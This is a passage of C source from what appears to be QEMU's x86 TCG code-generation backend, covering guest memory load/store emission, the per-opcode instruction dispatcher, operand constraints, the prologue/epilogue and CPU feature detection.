            tcg_out_modrm_offset(s, movop + P_REXW + seg, datalo, base, ofs);
            if (bswap) {
                tcg_out_bswap64(s, datalo);
            }
        } else {
            if (real_bswap) {
                int t = datalo;
                datalo = datahi;
                datahi = t;
            }
            /* order the two 32-bit loads so BASE isn't clobbered early */
            if (base != datalo) {
                tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs);
                tcg_out_modrm_offset(s, movop + seg, datahi, base, ofs + 4);
            } else {
                tcg_out_modrm_offset(s, movop + seg, datahi, base, ofs + 4);
                tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs);
            }
            if (bswap) {
                tcg_out_bswap32(s, datalo);
                tcg_out_bswap32(s, datahi);
            }
        }
        break;
    default:
        tcg_abort();
    }
}

/* XXX: qemu_ld and qemu_st could be modified to clobber only EDX and
   EAX.  It will be useful once fixed registers globals are less
   common. */
/* Generate a guest load: TLB lookup fast path (softmmu) or direct
   GUEST_BASE-relative access (user mode). */
static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is64)
{
    TCGReg datalo, datahi, addrlo;
    TCGReg addrhi QEMU_UNUSED_VAR;
    TCGMemOp opc;
#if defined(CONFIG_SOFTMMU)
    int mem_index;
    TCGMemOp s_bits;
    tcg_insn_unit *label_ptr[2];
#endif

    datalo = *args++;
    datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0);
    addrlo = *args++;
    addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ?
*args++ : 0);
    opc = *args++;

#if defined(CONFIG_SOFTMMU)
    mem_index = *args++;
    s_bits = opc & MO_SIZE;

    tcg_out_tlb_load(s, addrlo, addrhi, mem_index, s_bits,
                     label_ptr, offsetof(CPUTLBEntry, addr_read));

    /* TLB Hit.  */
    tcg_out_qemu_ld_direct(s, datalo, datahi, TCG_REG_L1, 0, 0, opc);

    /* Record the current context of a load into ldst label */
    add_qemu_ldst_label(s, true, opc, datalo, datahi, addrlo, addrhi,
                        mem_index, s->code_ptr, label_ptr);
#else
    {
        int32_t offset = GUEST_BASE;
        TCGReg base = addrlo;
        int seg = 0;

        /* ??? We assume all operations have left us with register contents
           that are zero extended.  So far this appears to be true.  If we
           want to enforce this, we can either do an explicit zero-extension
           here, or (if GUEST_BASE == 0, or a segment register is in use)
           use the ADDR32 prefix.  For now, do nothing. */
        if (GUEST_BASE && s->guest_base_flags) {
            seg = s->guest_base_flags;
            offset = 0;
        } else if (TCG_TARGET_REG_BITS == 64 && offset != GUEST_BASE) {
            /* GUEST_BASE doesn't fit in a disp32: add it via a scratch reg */
            tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_L1, GUEST_BASE);
            tgen_arithr(s, ARITH_ADD + P_REXW, TCG_REG_L1, base);
            base = TCG_REG_L1;
            offset = 0;
        }

        tcg_out_qemu_ld_direct(s, datalo, datahi, base, offset, seg, opc);
    }
#endif
}

/* Emit the actual host store for a guest store: DATALO/DATAHI to
   BASE+OFS, honoring the byte-swap in MEMOP.  SEG optionally adds a
   segment override prefix. */
static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg datalo, TCGReg datahi,
                                   TCGReg base, intptr_t ofs, int seg,
                                   TCGMemOp memop)
{
    /* ??? Ideally we wouldn't need a scratch register.  For user-only,
       we could perform the bswap twice to restore the original value
       instead of moving to the scratch.  But as it is, the L constraint
       means that TCG_REG_L0 is definitely free here. */
    const TCGReg scratch = TCG_REG_L0;
    const TCGMemOp real_bswap = memop & MO_BSWAP;
    TCGMemOp bswap = real_bswap;
    int movop = OPC_MOVL_EvGv;

    /* movbe stores-and-swaps in one insn when available */
    if (s->have_movbe && real_bswap) {
        bswap = 0;
        movop = OPC_MOVBE_MyGy;
    }

    switch (memop & MO_SIZE) {
    case MO_8:
        /* In 32-bit mode, 8-bit stores can only happen from [abcd]x.
Use the scratch register if necessary. */
        if (TCG_TARGET_REG_BITS == 32 && datalo >= 4) {
            tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo);
            datalo = scratch;
        }
        tcg_out_modrm_offset(s, OPC_MOVB_EvGv + P_REXB_R + seg,
                             datalo, base, ofs);
        break;
    case MO_16:
        if (bswap) {
            tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo);
            tcg_out_rolw_8(s, scratch);
            datalo = scratch;
        }
        tcg_out_modrm_offset(s, movop + P_DATA16 + seg, datalo, base, ofs);
        break;
    case MO_32:
        if (bswap) {
            tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo);
            tcg_out_bswap32(s, scratch);
            datalo = scratch;
        }
        tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs);
        break;
    case MO_64:
        if (TCG_TARGET_REG_BITS == 64) {
            if (bswap) {
                tcg_out_mov(s, TCG_TYPE_I64, scratch, datalo);
                tcg_out_bswap64(s, scratch);
                datalo = scratch;
            }
            tcg_out_modrm_offset(s, movop + P_REXW + seg, datalo, base, ofs);
        } else if (bswap) {
            /* 32-bit host: store the two swapped halves in reverse order */
            tcg_out_mov(s, TCG_TYPE_I32, scratch, datahi);
            tcg_out_bswap32(s, scratch);
            tcg_out_modrm_offset(s, OPC_MOVL_EvGv + seg, scratch, base, ofs);
            tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo);
            tcg_out_bswap32(s, scratch);
            tcg_out_modrm_offset(s, OPC_MOVL_EvGv + seg, scratch, base, ofs+4);
        } else {
            if (real_bswap) {
                int t = datalo;
                datalo = datahi;
                datahi = t;
            }
            tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs);
            tcg_out_modrm_offset(s, movop + seg, datahi, base, ofs+4);
        }
        break;
    default:
        tcg_abort();
    }
}

/* Generate a guest store: TLB lookup fast path (softmmu) or direct
   GUEST_BASE-relative access (user mode). */
static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is64)
{
    TCGReg datalo, datahi, addrlo;
    TCGReg addrhi QEMU_UNUSED_VAR;
    TCGMemOp opc;
#if defined(CONFIG_SOFTMMU)
    int mem_index;
    TCGMemOp s_bits;
    tcg_insn_unit *label_ptr[2];
#endif

    datalo = *args++;
    datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0);
    addrlo = *args++;
    addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ?
*args++ : 0);
    opc = *args++;

#if defined(CONFIG_SOFTMMU)
    mem_index = *args++;
    s_bits = opc & MO_SIZE;

    tcg_out_tlb_load(s, addrlo, addrhi, mem_index, s_bits,
                     label_ptr, offsetof(CPUTLBEntry, addr_write));

    /* TLB Hit.  */
    tcg_out_qemu_st_direct(s, datalo, datahi, TCG_REG_L1, 0, 0, opc);

    /* Record the current context of a store into ldst label */
    add_qemu_ldst_label(s, false, opc, datalo, datahi, addrlo, addrhi,
                        mem_index, s->code_ptr, label_ptr);
#else
    {
        int32_t offset = GUEST_BASE;
        TCGReg base = addrlo;
        int seg = 0;

        /* ??? We assume all operations have left us with register contents
           that are zero extended.  So far this appears to be true.  If we
           want to enforce this, we can either do an explicit zero-extension
           here, or (if GUEST_BASE == 0, or a segment register is in use)
           use the ADDR32 prefix.  For now, do nothing. */
        if (GUEST_BASE && s->guest_base_flags) {
            seg = s->guest_base_flags;
            offset = 0;
        } else if (TCG_TARGET_REG_BITS == 64 && offset != GUEST_BASE) {
            /* GUEST_BASE doesn't fit in a disp32: add it via a scratch reg */
            tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_L1, GUEST_BASE);
            tgen_arithr(s, ARITH_ADD + P_REXW, TCG_REG_L1, base);
            base = TCG_REG_L1;
            offset = 0;
        }

        tcg_out_qemu_st_direct(s, datalo, datahi, base, offset, seg, opc);
    }
#endif
}

/* Main per-opcode code generator: dispatch on the TCG opcode and emit
   the corresponding host instructions. */
static inline void tcg_out_op(TCGContext *s, TCGOpcode opc,
                              const TCGArg *args, const int *const_args)
{
    int c, vexop, rexw = 0;

/* OP_32_64(x) covers both the _i32 and (on 64-bit hosts) _i64 variant
   of opcode x, setting rexw for the 64-bit case. */
#if TCG_TARGET_REG_BITS == 64
# define OP_32_64(x) \
        case glue(glue(INDEX_op_, x), _i64): \
            rexw = P_REXW; /* FALLTHRU */ \
        case glue(glue(INDEX_op_, x), _i32)
#else
# define OP_32_64(x) \
        case glue(glue(INDEX_op_, x), _i32)
#endif

    switch(opc) {
    case INDEX_op_exit_tb:
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_EAX, args[0]);
        tcg_out_jmp(s, s->tb_ret_addr);
        break;
    case INDEX_op_goto_tb:
        if (s->tb_jmp_offset) {
            /* direct jump method */
            tcg_out8(s, OPC_JMP_long); /* jmp im */
            s->tb_jmp_offset[args[0]] = tcg_current_code_size(s);
            tcg_out32(s, 0);
        } else {
/* indirect jump method */
            tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, -1,
                                 (intptr_t)(s->tb_next + args[0]));
        }
        s->tb_next_offset[args[0]] = tcg_current_code_size(s);
        break;
    case INDEX_op_br:
        tcg_out_jxx(s, JCC_JMP, args[0], 0);
        break;
    OP_32_64(ld8u):
        /* Note that we can ignore REXW for the zero-extend to 64-bit.  */
        tcg_out_modrm_offset(s, OPC_MOVZBL, args[0], args[1], args[2]);
        break;
    OP_32_64(ld8s):
        tcg_out_modrm_offset(s, OPC_MOVSBL + rexw, args[0], args[1], args[2]);
        break;
    OP_32_64(ld16u):
        /* Note that we can ignore REXW for the zero-extend to 64-bit.  */
        tcg_out_modrm_offset(s, OPC_MOVZWL, args[0], args[1], args[2]);
        break;
    OP_32_64(ld16s):
        tcg_out_modrm_offset(s, OPC_MOVSWL + rexw, args[0], args[1], args[2]);
        break;
#if TCG_TARGET_REG_BITS == 64
    case INDEX_op_ld32u_i64:
#endif
    case INDEX_op_ld_i32:
        tcg_out_ld(s, TCG_TYPE_I32, args[0], args[1], args[2]);
        break;

    OP_32_64(st8):
        if (const_args[0]) {
            /* store of a constant byte */
            tcg_out_modrm_offset(s, OPC_MOVB_EvIz,
                                 0, args[1], args[2]);
            tcg_out8(s, args[0]);
        } else {
            tcg_out_modrm_offset(s, OPC_MOVB_EvGv | P_REXB_R,
                                 args[0], args[1], args[2]);
        }
        break;
    OP_32_64(st16):
        if (const_args[0]) {
            tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_DATA16,
                                 0, args[1], args[2]);
            tcg_out16(s, args[0]);
        } else {
            tcg_out_modrm_offset(s, OPC_MOVL_EvGv | P_DATA16,
                                 args[0], args[1], args[2]);
        }
        break;
#if TCG_TARGET_REG_BITS == 64
    case INDEX_op_st32_i64:
#endif
    case INDEX_op_st_i32:
        if (const_args[0]) {
            tcg_out_modrm_offset(s, OPC_MOVL_EvIz, 0, args[1], args[2]);
            tcg_out32(s, args[0]);
        } else {
            tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]);
        }
        break;

    OP_32_64(add):
        /* For 3-operand addition, use LEA.
*/
        if (args[0] != args[1]) {
            TCGArg a0 = args[0], a1 = args[1], a2 = args[2], c3 = 0;

            if (const_args[2]) {
                c3 = a2, a2 = -1;
            } else if (a0 == a2) {
                /* Watch out for dest = src + dest, since we've removed
                   the matching constraint on the add.  */
                tgen_arithr(s, ARITH_ADD + rexw, a0, a1);
                break;
            }

            tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, a1, a2, 0, c3);
            break;
        }
        c = ARITH_ADD;
        goto gen_arith;
    OP_32_64(sub):
        c = ARITH_SUB;
        goto gen_arith;
    OP_32_64(and):
        c = ARITH_AND;
        goto gen_arith;
    OP_32_64(or):
        c = ARITH_OR;
        goto gen_arith;
    OP_32_64(xor):
        c = ARITH_XOR;
        goto gen_arith;
    gen_arith:
        if (const_args[2]) {
            tgen_arithi(s, c + rexw, args[0], args[2], 0);
        } else {
            tgen_arithr(s, c + rexw, args[0], args[2]);
        }
        break;

    OP_32_64(andc):
        if (const_args[2]) {
            /* and-with-complement of a constant is just AND of ~imm */
            tcg_out_mov(s, rexw ? TCG_TYPE_I64 : TCG_TYPE_I32,
                        args[0], args[1]);
            tgen_arithi(s, ARITH_AND + rexw, args[0], ~args[2], 0);
        } else {
            /* BMI1 andn */
            tcg_out_vex_modrm(s, OPC_ANDN + rexw, args[0], args[2], args[1]);
        }
        break;

    OP_32_64(mul):
        if (const_args[2]) {
            int32_t val;
            val = args[2];
            if (val == (int8_t)val) {
                tcg_out_modrm(s, OPC_IMUL_GvEvIb + rexw, args[0], args[0]);
                tcg_out8(s, val);
            } else {
                tcg_out_modrm(s, OPC_IMUL_GvEvIz + rexw, args[0], args[0]);
                tcg_out32(s, val);
            }
        } else {
            tcg_out_modrm(s, OPC_IMUL_GvEv + rexw, args[0], args[2]);
        }
        break;

    OP_32_64(div2):
        tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IDIV, args[4]);
        break;
    OP_32_64(divu2):
        tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_DIV, args[4]);
        break;

    OP_32_64(shl):
        c = SHIFT_SHL;
        vexop = OPC_SHLX;
        goto gen_shift_maybe_vex;
    OP_32_64(shr):
        c = SHIFT_SHR;
        vexop = OPC_SHRX;
        goto gen_shift_maybe_vex;
    OP_32_64(sar):
        c = SHIFT_SAR;
        vexop = OPC_SARX;
        goto gen_shift_maybe_vex;
    OP_32_64(rotl):
        c = SHIFT_ROL;
        goto gen_shift;
    OP_32_64(rotr):
        c = SHIFT_ROR;
        goto gen_shift;
    gen_shift_maybe_vex:
        /* BMI2 shlx/shrx/sarx take the count in any register */
        if (have_bmi2 &&
!const_args[2]) { + tcg_out_vex_modrm(s, vexop + rexw, args[0], args[2], args[1]); + break; + } + /* FALLTHRU */ + gen_shift: + if (const_args[2]) { + tcg_out_shifti(s, c + rexw, args[0], args[2]); + } else { + tcg_out_modrm(s, OPC_SHIFT_cl + rexw, c, args[0]); + } + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond32(s, args[2], args[0], args[1], const_args[1], + args[3], 0); + break; + case INDEX_op_setcond_i32: + tcg_out_setcond32(s, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i32: + tcg_out_movcond32(s, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + OP_32_64(bswap16): + tcg_out_rolw_8(s, args[0]); + break; + OP_32_64(bswap32): + tcg_out_bswap32(s, args[0]); + break; + + OP_32_64(neg): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NEG, args[0]); + break; + OP_32_64(not): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NOT, args[0]); + break; + + OP_32_64(ext8s): + tcg_out_ext8s(s, args[0], args[1], rexw); + break; + OP_32_64(ext16s): + tcg_out_ext16s(s, args[0], args[1], rexw); + break; + OP_32_64(ext8u): + tcg_out_ext8u(s, args[0], args[1]); + break; + OP_32_64(ext16u): + tcg_out_ext16u(s, args[0], args[1]); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args, 0); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args, 1); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args, 0); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args, 1); + break; + + OP_32_64(mulu2): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_MUL, args[3]); + break; + OP_32_64(muls2): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IMUL, args[3]); + break; + OP_32_64(add2): + if (const_args[4]) { + tgen_arithi(s, ARITH_ADD + rexw, args[0], args[4], 1); + } else { + tgen_arithr(s, ARITH_ADD + rexw, args[0], args[4]); + } + if (const_args[5]) { + tgen_arithi(s, ARITH_ADC + rexw, args[1], args[5], 1); + } else { + tgen_arithr(s, ARITH_ADC + rexw, args[1], args[5]); + } + break; + 
OP_32_64(sub2): + if (const_args[4]) { + tgen_arithi(s, ARITH_SUB + rexw, args[0], args[4], 1); + } else { + tgen_arithr(s, ARITH_SUB + rexw, args[0], args[4]); + } + if (const_args[5]) { + tgen_arithi(s, ARITH_SBB + rexw, args[1], args[5], 1); + } else { + tgen_arithr(s, ARITH_SBB + rexw, args[1], args[5]); + } + break; + +#if TCG_TARGET_REG_BITS == 32 + case INDEX_op_brcond2_i32: + tcg_out_brcond2(s, args, const_args, 0); + break; + case INDEX_op_setcond2_i32: + tcg_out_setcond2(s, args, const_args); + break; +#else /* TCG_TARGET_REG_BITS == 64 */ + case INDEX_op_ld32s_i64: + tcg_out_modrm_offset(s, OPC_MOVSLQ, args[0], args[1], args[2]); + break; + case INDEX_op_ld_i64: + tcg_out_ld(s, TCG_TYPE_I64, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + if (const_args[0]) { + tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_REXW, + 0, args[1], args[2]); + tcg_out32(s, args[0]); + } else { + tcg_out_st(s, TCG_TYPE_I64, args[0], args[1], args[2]); + } + break; + + case INDEX_op_brcond_i64: + tcg_out_brcond64(s, args[2], args[0], args[1], const_args[1], + args[3], 0); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond64(s, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond64(s, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + case INDEX_op_bswap64_i64: + tcg_out_bswap64(s, args[0]); + break; + case INDEX_op_ext32u_i64: + tcg_out_ext32u(s, args[0], args[1]); + break; + case INDEX_op_ext32s_i64: + tcg_out_ext32s(s, args[0], args[1]); + break; +#endif + + OP_32_64(deposit): + if (args[3] == 0 && args[4] == 8) { + /* load bits 0..7 */ + tcg_out_modrm(s, OPC_MOVB_EvGv | P_REXB_R | P_REXB_RM, + args[2], args[0]); + } else if (args[3] == 8 && args[4] == 8) { + /* load bits 8..15 */ + tcg_out_modrm(s, OPC_MOVB_EvGv, args[2], args[0] + 4); + } else if (args[3] == 0 && args[4] == 16) { + /* load bits 0..15 */ + tcg_out_modrm(s, OPC_MOVL_EvGv | P_DATA16, args[2], args[0]); + } else { + 
tcg_abort(); + } + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } + +#undef OP_32_64 +} + +static const TCGTargetOpDef x86_op_defs[] = { + { INDEX_op_exit_tb, { NULL } }, + { INDEX_op_goto_tb, { NULL } }, + { INDEX_op_br, { NULL } }, + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "qi", "r" } }, + { INDEX_op_st16_i32, { "ri", "r" } }, + { INDEX_op_st_i32, { "ri", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "ri" } }, + { INDEX_op_sub_i32, { "r", "0", "ri" } }, + { INDEX_op_mul_i32, { "r", "0", "ri" } }, + { INDEX_op_div2_i32, { "a", "d", "0", "1", "r" } }, + { INDEX_op_divu2_i32, { "a", "d", "0", "1", "r" } }, + { INDEX_op_and_i32, { "r", "0", "ri" } }, + { INDEX_op_or_i32, { "r", "0", "ri" } }, + { INDEX_op_xor_i32, { "r", "0", "ri" } }, + { INDEX_op_andc_i32, { "r", "r", "ri" } }, + + { INDEX_op_shl_i32, { "r", "0", "Ci" } }, + { INDEX_op_shr_i32, { "r", "0", "Ci" } }, + { INDEX_op_sar_i32, { "r", "0", "Ci" } }, + { INDEX_op_rotl_i32, { "r", "0", "ci" } }, + { INDEX_op_rotr_i32, { "r", "0", "ci" } }, + + { INDEX_op_brcond_i32, { "r", "ri" } }, + + { INDEX_op_bswap16_i32, { "r", "0" } }, + { INDEX_op_bswap32_i32, { "r", "0" } }, + + { INDEX_op_neg_i32, { "r", "0" } }, + + { INDEX_op_not_i32, { "r", "0" } }, + + { INDEX_op_ext8s_i32, { "r", "q" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_ext8u_i32, { "r", "q" } }, + { INDEX_op_ext16u_i32, { "r", "r" } }, + + { INDEX_op_setcond_i32, { "q", "r", "ri" } }, + + { INDEX_op_deposit_i32, { "Q", "0", "Q" } }, + { INDEX_op_movcond_i32, { "r", "r", "ri", "r", "0" } }, + + { INDEX_op_mulu2_i32, { "a", "d", "a", "r" 
} }, + { INDEX_op_muls2_i32, { "a", "d", "a", "r" } }, + { INDEX_op_add2_i32, { "r", "r", "0", "1", "ri", "ri" } }, + { INDEX_op_sub2_i32, { "r", "r", "0", "1", "ri", "ri" } }, + +#if TCG_TARGET_REG_BITS == 32 + { INDEX_op_brcond2_i32, { "r", "r", "ri", "ri" } }, + { INDEX_op_setcond2_i32, { "r", "r", "r", "ri", "ri" } }, +#else + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + { INDEX_op_st8_i64, { "ri", "r" } }, + { INDEX_op_st16_i64, { "ri", "r" } }, + { INDEX_op_st32_i64, { "ri", "r" } }, + { INDEX_op_st_i64, { "re", "r" } }, + + { INDEX_op_add_i64, { "r", "r", "re" } }, + { INDEX_op_mul_i64, { "r", "0", "re" } }, + { INDEX_op_div2_i64, { "a", "d", "0", "1", "r" } }, + { INDEX_op_divu2_i64, { "a", "d", "0", "1", "r" } }, + { INDEX_op_sub_i64, { "r", "0", "re" } }, + { INDEX_op_and_i64, { "r", "0", "reZ" } }, + { INDEX_op_or_i64, { "r", "0", "re" } }, + { INDEX_op_xor_i64, { "r", "0", "re" } }, + { INDEX_op_andc_i64, { "r", "r", "rI" } }, + + { INDEX_op_shl_i64, { "r", "0", "Ci" } }, + { INDEX_op_shr_i64, { "r", "0", "Ci" } }, + { INDEX_op_sar_i64, { "r", "0", "Ci" } }, + { INDEX_op_rotl_i64, { "r", "0", "ci" } }, + { INDEX_op_rotr_i64, { "r", "0", "ci" } }, + + { INDEX_op_brcond_i64, { "r", "re" } }, + { INDEX_op_setcond_i64, { "r", "r", "re" } }, + + { INDEX_op_bswap16_i64, { "r", "0" } }, + { INDEX_op_bswap32_i64, { "r", "0" } }, + { INDEX_op_bswap64_i64, { "r", "0" } }, + { INDEX_op_neg_i64, { "r", "0" } }, + { INDEX_op_not_i64, { "r", "0" } }, + + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_ext8u_i64, { "r", "r" } }, + { INDEX_op_ext16u_i64, { "r", "r" } }, + { INDEX_op_ext32u_i64, { "r", "r" } }, + + { INDEX_op_deposit_i64, { "Q", "0", "Q" } }, + 
{ INDEX_op_movcond_i64, { "r", "r", "re", "r", "0" } }, + + { INDEX_op_mulu2_i64, { "a", "d", "a", "r" } }, + { INDEX_op_muls2_i64, { "a", "d", "a", "r" } }, + { INDEX_op_add2_i64, { "r", "r", "0", "1", "re", "re" } }, + { INDEX_op_sub2_i64, { "r", "r", "0", "1", "re", "re" } }, +#endif + +#if TCG_TARGET_REG_BITS == 64 + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L" } }, +#elif TARGET_LONG_BITS <= TCG_TARGET_REG_BITS + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "r", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L", "L" } }, +#else + { INDEX_op_qemu_ld_i32, { "r", "L", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "r", "L", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L", "L", "L" } }, +#endif + { -1 }, +}; + +static int tcg_target_callee_save_regs[] = { +#if TCG_TARGET_REG_BITS == 64 + TCG_REG_RBP, + TCG_REG_RBX, +#if (defined(_WIN64) || defined(__CYGWIN__)) + TCG_REG_RDI, + TCG_REG_RSI, +#endif + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, /* Currently used for the global env. */ + TCG_REG_R15, +#else + TCG_REG_EBP, /* Currently used for the global env. */ + TCG_REG_EBX, + TCG_REG_ESI, + TCG_REG_EDI, +#endif +}; + +/* Compute frame size via macros, to share between tcg_target_qemu_prologue + and tcg_register_jit. */ + +#define PUSH_SIZE \ + ((1 + ARRAY_SIZE(tcg_target_callee_save_regs)) \ + * (TCG_TARGET_REG_BITS / 8)) + +#define FRAME_SIZE \ + ((PUSH_SIZE \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + + TCG_TARGET_STACK_ALIGN - 1) \ + & ~(TCG_TARGET_STACK_ALIGN - 1)) + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int i, stack_addend; + + /* TB prologue */ + + /* Reserve some stack space, also for TCG temps. 
*/ + stack_addend = FRAME_SIZE - PUSH_SIZE; + tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + /* Save all callee saved registers. */ + for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { + tcg_out_push(s, tcg_target_callee_save_regs[i]); + } + +#if TCG_TARGET_REG_BITS == 32 + tcg_out_ld(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, + (ARRAY_SIZE(tcg_target_callee_save_regs) + 1) * 4); + tcg_out_addi(s, TCG_REG_ESP, -stack_addend); + /* jmp *tb. */ + tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, TCG_REG_ESP, + (ARRAY_SIZE(tcg_target_callee_save_regs) + 2) * 4 + + stack_addend); +#else + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tcg_out_addi(s, TCG_REG_ESP, -stack_addend); + /* jmp *tb. */ + tcg_out_modrm(s, OPC_GRP5, EXT5_JMPN_Ev, tcg_target_call_iarg_regs[1]); +#endif + + /* TB epilogue */ + s->tb_ret_addr = s->code_ptr; + + tcg_out_addi(s, TCG_REG_CALL_STACK, stack_addend); + + for (i = ARRAY_SIZE(tcg_target_callee_save_regs) - 1; i >= 0; i--) { + tcg_out_pop(s, tcg_target_callee_save_regs[i]); + } + tcg_out_opc(s, OPC_RET, 0, 0, 0); + +#if !defined(CONFIG_SOFTMMU) + /* Try to set up a segment register to point to GUEST_BASE. */ + if (GUEST_BASE) { + setup_guest_base_seg(s); + } +#endif +} + +static void tcg_target_init(TCGContext *s) +{ +#ifdef CONFIG_CPUID_H + unsigned a, b, c, d; + int max; + +#ifdef _MSC_VER + int cpu_info[4]; + __cpuid(cpu_info, 0); + max = cpu_info[0]; +#else + max = __get_cpuid_max(0, 0); +#endif + + if (max >= 1) { +#ifdef _MSC_VER + __cpuid(cpu_info, 1); + a = cpu_info[0]; + b = cpu_info[1]; + c = cpu_info[2]; + d = cpu_info[3]; +#else + __cpuid(1, a, b, c, d); +#endif +#ifndef have_cmov + /* For 32-bit, 99% certainty that we're running on hardware that + supports cmov, but we still need to check. In case cmov is not + available, we'll use a small forward branch. 
*/ + have_cmov = (d & bit_CMOV) != 0; +#endif +#ifndef have_movbe + /* MOVBE is only available on Intel Atom and Haswell CPUs, so we + need to probe for it. */ + s->have_movbe = (c & bit_MOVBE) != 0; +#endif + } + + if (max >= 7) { + /* BMI1 is available on AMD Piledriver and Intel Haswell CPUs. */ +#ifdef _MSC_VER + __cpuidex(cpu_info, 7, 0); +#else + __cpuid_count(7, 0, a, b, c, d); +#endif +#ifdef bit_BMI + have_bmi1 = (b & bit_BMI) != 0; +#endif +#ifndef have_bmi2 + have_bmi2 = (b & bit_BMI2) != 0; +#endif + } +#endif + + if (TCG_TARGET_REG_BITS == 64) { + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffff); + } else { + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xff); + } + + tcg_regset_clear(s->tcg_target_call_clobber_regs); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EAX); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EDX); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_ECX); + if (TCG_TARGET_REG_BITS == 64) { +#if !(defined(_WIN64) || defined(__CYGWIN__)) + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RDI); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RSI); +#endif + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); + } + + 